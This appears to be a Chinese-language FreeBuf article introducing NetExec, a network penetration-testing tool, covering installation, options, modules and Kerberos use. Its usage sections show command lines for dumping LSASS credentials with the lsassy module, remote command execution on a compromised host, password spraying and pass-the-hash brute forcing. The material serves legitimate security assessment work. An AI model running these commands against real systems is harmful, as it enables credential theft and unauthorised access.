freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

NetExec:一款功能强大的自动化网络安全评估与漏洞测试工具
2024-01-12 09:24:38

关于NetExec

NetExec是一款功能强大的自动化网络安全评估与漏洞测试工具,该工具可以帮助广大研究人员以自动化的形式测试大型网络的安全,并通过利用网络服务漏洞来评估目标网络的安全态势。

支持的协议

1、SMB协议

2、LDAP协议

3、WinRM协议

4、MSSQL协议

5、SSH协议

6、FTP协议

7、RDP协议

8、WMI协议

工具安装

Unix安装

广大研究人员可以使用pipx系统全局安装:

apt install pipx git

pipx ensurepath

pipx install git+https://github.com/Pennyw0rth/NetExec

然后直接运行即可:

NetExec

nxcdb

我们还可以使用Poetry来安装:

apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

poetry install

poetry run NetExec

或者使用pip安装:

apt install python3 python3-pip

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

python3 -m venv .

source bin/activate

pip install .

NetExec

Windows安装

如果你是Windows用户的话,可以直接访问该项目的【Releases页面】下载最新版本的NetExec预编译版本,解压后直接在命令行窗口中运行即可使用。

工具使用

工具命令参数

#~ nxc --help

usage: nxc [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--no-progress] [--verbose] [--debug] [--version] {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql} ...

 

    <-- Banner -->   

 

options:

  -h, --help               显示工具帮助信息和退出

  -t THREADS            设置并行线程数量(默认:100)

  --timeout TIMEOUT     设置每个线程的超时时间(默认:None)

  --jitter INTERVAL       设置每次连接的随机时间间隔(默认:None)

  --no-progress          在扫描过程中不显示进度条

  --verbose              启用Verbose模式

  --debug               启用调试模式

  --version              显示工具版本信息

 

protocols:

  available protocols

 

  {smb,ssh,ldap,ftp,wmi,winrm,rdp,vnc,mssql}

    smb                 使用SMB协议

    ssh                 使用SSH协议

    ldap                使用LDAP协议

    ftp                 使用FTP协议

    wmi                 使用WMI协议

    winrm               使用WINRM协议

    rdp                 使用RDP协议

    vnc                 使用VNC协议

    mssql               使用MSSQL协议

模块使用

查看可用模块:

nxc smb -L

使用一个模块:

nxc smb <target(s)> -u Administrator -p 'October2022' -M lsassy

查看模块选项:

nxc smb -M lsassy --options

使用模块选项:

nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M lsassy -o COMMAND=xxxxxxxxug'

Kerberos使用

$ sudo nxc smb zoro.gold.local -k -u bonclay -p Ocotober2022

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

或使用--use-kcache:

$ export KRB5CCNAME=/home/bonclay/impacket/administrator.ccache

$ nxc smb zoro.gold.local --use-kcache

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\administrator (Pwn3d!)

SMB         zoro.gold.local 445    ZORO             [+] Executed command

SMB         zoro.gold.local 445    ZORO             gold\administrator

 

$ export KRB5CCNAME=/home/bonclay/impacket/bonclay.ccache

$ sudo nxc smb zoro.gold.local --use-kcache -x whoami

SMB         zoro.gold.local 445    ZORO             [*] Windows 10.0 Build 14393 (name:ZORO) (domain:gold.local) (signing:False) (SMBv1:False)

SMB         zoro.gold.local 445    ZORO             [+] gold.local\bonclay

爆破&密码喷射

netexec <protocol> <target(s)> -u username1 -p password1 password2

netexec <protocol> <target(s)> -u username1 username2 -p password1

netexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords

netexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

netexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce

netexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce

许可证协议

本项目的开发与发布遵循BSD-2-Clause开源许可证协议。

项目地址

NetExec:【GitHub传送门

参考资料

https://netexec.wiki/

# 网络安全 # 安全评估 # 漏洞扫描 # 协议安全 # 网络扫描
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录